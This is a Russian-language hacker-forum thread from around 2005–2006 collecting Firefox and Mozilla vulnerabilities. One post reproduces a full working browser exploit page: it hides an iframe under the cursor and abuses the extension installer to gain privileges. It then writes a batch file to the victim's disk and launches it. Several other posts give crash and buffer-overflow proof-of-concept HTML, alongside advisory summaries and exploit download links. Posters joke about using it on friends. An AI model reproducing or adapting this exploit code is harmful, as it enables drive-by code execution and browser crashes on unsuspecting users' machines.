+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 20 из 21

Тема: Mozilla/FireFox exploit

  1. #1
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию Mozilla/FireFox exploit

    Короче, всем известно, что не так давно стало известно о критической ошибке FireFox/Mozilla (новость )
    просматривая материал по данной теме нашел сплоит по использованию данного бага.
    Чуть в том, что при нажатии клавиши мыши в любом месте специально сформированной странице, сплоит создает и запускает batch/exe файл....а это очень серъезно...

    Лекарство: пропатченные новые версии этих браузеров (новость )

    обсуждаем ;)

  2. #2
    s4SSn
    Guest

    По умолчанию

    Цитата Сообщение от n0ns3ns3
    Короче, всем известно, что не так давно стало известно о критической ошибке FireFox/Mozilla (новость )
    просматривая материал по данной теме нашел сплоит по использованию данного бага.
    Чуть в том, что при нажатии клавиши мыши в любом месте специально сформированной странице, сплоит создает и запускает batch/exe файл....а это очень серъезно...

    Лекарство: пропатченные новые версии этих браузеров (новость )

    обсуждаем ;)
    хе... щас все будут пытатья kheu-друга поиметь... надеюсь, ддырка под Win?

  3. #3
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    как я понял да, но попробуй и под никсы потестить ;) мож будет и там робить...хотя имхо маловероятно

  4. #4
    GaMBiT
    Guest

    По умолчанию

    Цитата Сообщение от n0ns3ns3
    как я понял да, но попробуй и под никсы потестить ;) мож будет и там робить...хотя имхо маловероятно
    А вдруг юзер какой-нить под wine-ом запустит

  5. #5
    s4SSn
    Guest

    По умолчанию

    Цитата Сообщение от n0ns3ns3
    как я понял да, но попробуй и под никсы потестить ;) мож будет и там робить...хотя имхо маловероятно

    ??? сам подумай... запускается exe файл... тестер, млин...

  6. #6
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    не выражаться... :mad:
    есть же эммуляторы...при том можно было бы проверить саму возможность запуска чего-либо с помощью данного скрипта, он запускает ехе batch файлы...но не факт, что только их...
    а у меня самого щас нет никсов, чтоб проверить самому...
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  7. #7
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    текст эксплоита:
    Код HTML:
    ------------------------------------- exploit.htm -------------------------------------
    // FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
    // If a user clicks anywhere on a specially crafted page, this code will
    // automatically create and execute a malicious batch/exe file.
    //
    // Update (08.05.2005) - The Mozilla Foundation patched (partially) this
    // issue on the server side by adding random letters and numbers to the
    // install function, which will prevent this exploit from working.
    
    <html><head><title>firefox 0day exploit</title>
    
    <body>Click anywhere inside this page<br>
    <br>Advisory - http://www.frsirt.com/english/advisories/2005/0493<br>
    <iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\')
    {window.name=\'stealcookies\';} else{ event={target:{href:\'http://ftp.mozilla.org/pub/
    mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are 
    vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
    UniversalXPConnect\\\\\\\');file=Components.classes***91;\\\\\\\'@mozilla.org/file/local;1\\\\\\\'***93;.
    createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\
    booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
    outputStream=Components.classes***91;\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'***93;.
    createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08
    |0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious commands here...
    \\\\\\\\nPAUSE\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();
    \\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
    id=220&application=firefox\' style=\'cursor:default;\'>&nbsp;&nbsp;&nbsp;</'+'a>'" 
    id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight=0" style=
    "position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px; padding:0px; 
    -moz-opacity:0"></iframe>
    
    
    <script language="JavaScript" type="text/javascript">
    
    document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
    } 
    
    var counter = 0; 
    function loader() {
    counter++
    if(counter == 1) {
    stealcookies.focus()
    } else if(counter == 2) {
    stealcookies.history.go(-1)
    //targetframe.style.display="none";
    }
    }
    </script>
    </body>
    </html>
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  8. #8
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    еще одна уязвимость (Frame Injection) в Mozilla 1.7.8, Firefox 1.0.4

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю изменить содержимое загруженной страницы и получить доступ к потенциально важным данным других пользователей.

    Уязвимость позволяет удаленному пользователю изменить содержимое загруженной страницы и получить доступ к потенциально важным данным.

    Эксплоит:
    http://secunia.com/multiple_browsers...rability_test/

    Решение: Способов устранения уязвимости не существует в настоящее время.
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  9. #9
    GaMBiT
    Guest

    По умолчанию

    Цитата Сообщение от n0ns3ns3
    текст эксплоита:
    =======поскипано=======
    Не работает на версии 1.0.4!

  10. #10
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Цитата Сообщение от GaMBiT
    Не работает на версии 1.0.4!
    это эксплоит только для <=1.0.3

    вот цитата с новости:
    ...
    Пока уязвимости из области "cross-site scripting" и удаленного доступа к системе обнаружены только в Firefox версии 1.0.3, однако эксперты антивирусной компании Secunia опасаются, что опасности подвергаются и пользователи других версий браузера....
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  11. #11
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String
    Formatted for your tesing /str0ke


    Versions Affected:
    Firefox Win32 1.0.6 and prior
    Firefox Linux 1.0.6 and prior
    Firefox 1.5 Beta 1 (Deer Park Alpha 2)

    Technical Details:
    The problem seems to be when a hostname which has all dashes causes the
    NormalizeIDN call in nsStandardURL::BuildNormalizedSpec to return true,
    but is sets encHost to an empty string. Meaning, Firefox appends 0 to
    approxLen and then appends the long string of dashes to the buffer
    instead. The following HTML code below will reproduce this issue:

    String:
    Код:
    <A HREF=https:--------------------------------------------- >
    
    -->
    
    <A HREF=https: >

  12. #12
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit
    Цель эксплоита: Mozilla Firefox <= 1.0.4

    Воздействие эксплоита: Выполнение произвольного кода

    Скачать эксплоит:
    http://www.securitylab.ru/_Exploits/...47exploit.html

    Mozilla Firefox <= 1.0.4 "data:" URLs Remote Script i
    njection Exploit
    Цель эксплоита: Mozilla Firefox <= 1.0.4

    Воздействие эксплоита: Выполнение произвольного кода

    Скачать эксплоит:
    http://www.securitylab.ru/_Exploits/...49exploit.html

    Mozilla Firefox <= 1.0.4 "IMG" Elements Code Execution Exploit
    Цель эксплоита: Mozilla Firefox <= 1.0.4

    Воздействие эксплоита: Выполнение произвольного кода

    Скачать эксплоит:
    http://www.securitylab.ru/_Exploits/...55exploit.html

  13. #13
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    эксплоит при преобразовании интернациональных имён (IDN) в Mozilla (FireFox, Mozilla, Netscape).
    уязвимость от Tom Ferris/www.security-protocols.com

    ЗЫ - а дырок все больше )

  14. #14
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    источник uinc.ru

    Уязвимость в Firefox

    Tom Ferris сообщает о наличии уязвимости во всё больше набирающем в последнее время браузере Firefox. Как сообщает автор, уязвимость связана с некооректной обработкой параметра ширины тэга IFRAME. Если задать его величину (IFRAME WIDTH) равной 33333333, произойдёт переполнение буфера в стеке, что может позволить выполнить произвольный код в системе. Уязвимость проверена в версии 1.0.7 для ОС Linux. Mozilla в настоящий момент работает над патчем.

    Firefox 1.0.7 IFRAME Float Stack Overflow

    Release Date:
    October 5, 2005

    Date Reported:
    August 8, 2005

    Severity:
    Medium

    Vendor:
    Mozilla Foundation

    Versions Affected:
    Firefox 1.0.7 Linux

    Overview:
    A stack overflow vulnerability exists within Firefox 1.0.7 and all prior
    versions for linux which may allow for an attacker to execute arbitrary code on a targeted
    host.

    Technical Details:
    The issue is when an IFRAME has the width of 33333333, this causes Firefox to
    crash.

    The following code below will reproduce this issue:

    <IFRAME WIDTH=33333333 >

    Another simple one huh?

    Vendor Status:
    Mozilla is currently working on a patch.

    Discovered by:
    Tom Ferris

    Related Links:
    www.security-protocols.com/poc/sp-x19-poc.html
    http://www.security-protocols.com/ad...9-advisory.txt
    www.evolvesecurity.com

    Copyright (c) 2005 Security-Protocols.com
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  15. #15
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Цитата Сообщение от [n0ns3ns3]
    источник uinc.ru

    Уязвимость в Firefox

    Tom Ferris сообщает о наличии уязвимости во всё больше набирающем в последнее время браузере Firefox. Как сообщает автор, уязвимость связана с некооректной обработкой параметра ширины тэга IFRAME. Если задать его величину (IFRAME WIDTH) равной 33333333, произойдёт переполнение буфера в стеке, что может позволить выполнить произвольный код в системе. Уязвимость проверена в версии 1.0.7 для ОС Linux. Mozilla в настоящий момент работает над патчем.
    пример эксплоита:
    Код HTML:
    <!--
    posidron@tripbit.net
    
    Vulnerable: Mozilla Firefox <= 1.0.7
                Mozilla Thunderbird  <= 1.0.6
    
    -->
    
    <html><body><strong>Mozilla<sourcetext></body></html>
    
    # milw0rm.com ***91;2005-10-16***93;
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  16. #16
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Опубликован исходный код (в виде javascript-кода), который использует уязвимость браузера Firefox 1.5. Принцип действия его довольно прост. Как пишет автор, Firefox использует для сохранения всех посещённых URL файл history.dat. Созданный скрипт сохраняет в этом файле очень большой топпик. В результате при следующей загрузке браузера происходит его постоянное зависание из-за переполнения буфера. Для устранения последствий рекомендуется ручное удаления файла history.dat.

    Код:
    <!-- Firefox 1.5 buffer overflow
    
    Basically firefox logs all kinda of URL data in it's history.dat file,
    this little script will set a really large topic and Firefox will then
    save that topic into it's history.dat.. The next time that firefox is
    opened, it will instantly crash due to a buffer overflow -- this will
    happen everytime until you manually delete the history.dat file -- which
    most users won't figure out.
    
    this proof of concept will only prevent someone from reopening
    their browser after being exploited. DoS if you will. however, code
    execution is possible with some modifcations.
    
    Tested with Firefox 1.5 on Windows XP SP2.
    
    ZIPLOCK <sickbeatz@gmail.com>
    
    -->
    <html><head><title>heh</title><script type="text/javascript">
    function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
    buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
    buffer2 += buffer;
    }
    document.title = buffer2;
    }
    </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
    </a></body></html>
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  17. #17
    aSj
    Guest

    По умолчанию

    Да уж, все дыряво. В опере тоже недавно нашли, по мелочи конечно, но все равно анноит:
    http://www.freebsd.org/ports/portaud...1020eed82.html
    http://www.freebsd.org/ports/portaud...1020eed82.html
    :(

  18. #18
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Множественные уязвимости в Mozilla Firefox

    Программа: Mozilla Firefox 1.5 и более ранние версии

    Опасность: Критическая

    Наличие эксплоита: Нет

    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю обойти ограничения безопасности, произвести XSS нападение и скомпрометировать удаленную систему.

    1. Обнаружено несколько ошибок в JavaScript engine при обработке временных переменных. Удаленный пользователь может выполнить произвольный сценарий на целевой системе. Уязвимы Mozilla Firefox 1.5 и более ранние версии.

    2. Обнаружена ошибка при обработке динамических стилей. Удаленный пользователь может изменить стиль элемента с "position:relative" на "position:static" и получить доступ к освобожденной памяти. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует в версии 1.5

    3. Уязвимость существует из-за ошибки в методе "QueryInterface" в объектах Location и Navigator. Удаленный пользователь может выполнить произвольный код на целевой системе. Уязвимость существует в версии 1.5.

    4. Уязвимость существует пир обработке входных данных в имени атрибута при вызове функции "XULDocument.persist()". Удаленный пользователь может внедрить произвольный XML или JavaScript код файл "localstore.rdf", который будет выполнен во время следующего запуска браузера.

    5. Несколько целочисленных переполнений обнаружены в модулях E4X, SVG и Canvas. Удаленный пользователь может выполнить произвольный код на целевой системе. Уязвимость существует в версии 1.5.

    6. Уязвимость существует при обработке данных в функции "nsExpatDriver::ParseBuffer()" XML парсера. Удаленный пользователь может получить доступ к данным , хранящимся в динамической памяти системы. Уязвимость существует в версии 1.0

    7. Уязвимость существует из-за недостаточной защищенности внутреннего объекта "AnyName" в модуле E4X. Удаленный пользователь может создать коммуникационный канал между двумя окнами или фреймами в различных доменах. Удаленный пользователь может получить доступ к важным данным на системе. Уязвимость существует в версии 1.0

    Решение: Установите последнюю версию (1.5.0.1) с сайта производителя.

  19. #19
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Отказ в обслуживании в Mozilla Firefox

    Программа: Mozilla Firefox 1.5.0.1 и более ранние версии.

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании браузера.

    Уязвимость существует из-за ошибки разыменования нулевого указателя. Удаленный пользователь может с помощью специально сформированной Web страницы аварийно завершить работу браузера. Пример:


    <legend>

    <kbd>

    <object>

    <h4>

    </object>

    </kbd>

    Решение: Установите последнюю версию (1.0.8 или 1.5.0.2) с сайта производителя.

  20. #20
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Множественные уязвимости в Mozilla Firefox

    Программа:
    Mozilla Firefox 1.5.0.1 и более ранние версии.
    Mozilla Suit версии до 1.7.13

    Опасность: Критическая

    Наличие эксплоита: Нет

    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, обойти ограничения безопасности, получить доступ к важным данным и скомпрометировать уязвимую систему.

    1. Уязвимость существует из-за ошибки, которая позволяет внедрить JavaScript код в другую, в данный момент загружающуюся, страницу. Удаленный пользователь может с помощью специально сформированного Web сайта выполнить произвольный код сценария в браузере жертвы в контексте безопасности любо сайта.

    2. Уязвимость существует из-за ошибки в garbage collection в JavaScript. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

    3. Ошибка при обработке входных данных в реализации каскадных стилей может позволить злоумышленнику дописать некоторые данные в конец массива.

    4. Целочисленной переполнение буфера обнаружено при обработке слишком длинных регулярных выражений в JavaScript. Удаленный пользователь может выполнить произвольный JavaScript код на системе.

    5. Обнаружено две ошибки при обработке "-moz-grid" и "-moz-grid-group" стилей. Удаленный пользователь может выполнить произвольный код на целевой системе.

    6. Ошибка обнаружена в методе "InstallTrigger.install()". Удаленный пользователь может вызвать повреждение памяти на системе.

    7. Уязвимость существует из-за неизвестной ошибки, которая позволяет в некоторых ситуациях подменить иконку с изображением безопасного замка и содержимое адресной строки путем изменения месторасположения pop-up окна. Для успешной эксплуатации уязвимости опция "Entering secure site" должна быть включена (По умолчанию отключена).

    8. Уязвимость позволяет злоумышленнику обманом заставить пользователя скачать злонамеренный файл с помощью меню "Save image as...".

    9. JavaScript функция, созданная вызовом "eval()" совместно с методом XBL привязки может быть скомпилирована с некорректными привилегиями. Удаленный пользователь может выполнить произвольный код на целевой системе.

    10. Обнаружена ошибка в методе "Object.watch()", открывающем внутренний "clone parent" объект функции. Удаленный пользователь может выполнить произвольный JavaScript код на системе.

    11. Обнаружена ошибка в способе зашиты сборки встроенных XBL связок. Удаленный пользователь может выполнить произвольный JavaScript сценарий на системе с повышенными привилегиями.

    12. Неизвестная ошибка позволяет удаленному пользователю выполнить произвольный код сценария посредством массива window.controllers.

    13. Уязвимость существует из-за ошибки при обработке определенной последовательности HTML тегов. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

    14. Уязвимость обнаружена в методах "valueOf.call()" и "valueOf.apply()". Удаленный пользователь может выполнить произвольный код сценария в браузере жертвы в контексте безопасности произвольного сайта.

    15. Обнаружено несколько ошибок в реализации DHTML. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

    16. Целочисленное переполнение обнаружено при обработке CSS свойства letter-spacing. Удаленный пользователь может вызвать переполнение динамической памяти и выполнить произвольный код на целевой системе.

    17. Уязвимость существует при обработке элементов формы для загрузки файлов. Удаленный пользователь может загрузить произвольные файлы с системы пользователя на сервер путем динамической подмены элемента текстовой строки на элемент загрузки файлов.

    18. Неизвестная ошибка существует в методе "crypto.generateCRMFRequest()". Удаленный пользователь может выполнить произвольный код на целевой системе.

    19. Ошибка при обработке сценариев в XBL элементах может позволить злоумышленнику получить chrome привилегии с помощью модуля "Print Preview".

    20. Уязвимость существует из-за ошибки при проверке безопасности в методе "js_ValueToFunctionObject()". Удаленный пользователь может выполнить произвольный код с помощью "setTimeout()" и "ForEach".

    21. Уязвимость существует из-за ошибки взаимодействия между содержимым XUL окна и механизмом “History”. Злоумышленник может обманом заставить пользователя взаимодействовать с невидимым пользовательским интерфейсом браузера.

    Решение: Установите последнюю версию с сайта производителя.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
Рейтинг@Mail.ru
Администрация сайта не выражает согласия
с высказыванием участников форума и не несет
ответственности за их содержание.

Копирование любого материала возможно только
при наличии ссылки на сайт.